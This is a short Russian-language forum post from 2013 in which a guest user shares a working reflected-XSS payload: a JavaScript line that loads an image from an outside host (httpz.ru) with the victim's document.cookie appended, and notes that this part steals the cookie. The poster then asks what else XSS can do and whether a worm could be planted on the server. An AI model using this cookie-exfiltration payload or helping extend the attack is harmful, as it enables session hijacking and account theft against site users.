
01.10.2013, 22:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 6020
Репутация:
0
|
|
Есть пассивная XSS, работает только с этим кодом:
Код:
Code:
img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;
За кражу cookie отвечает +document.cookie;
А что можно еще сделать с XSS?
Можно ли загнать на сервер какого нибудь червя?
|
|
|
|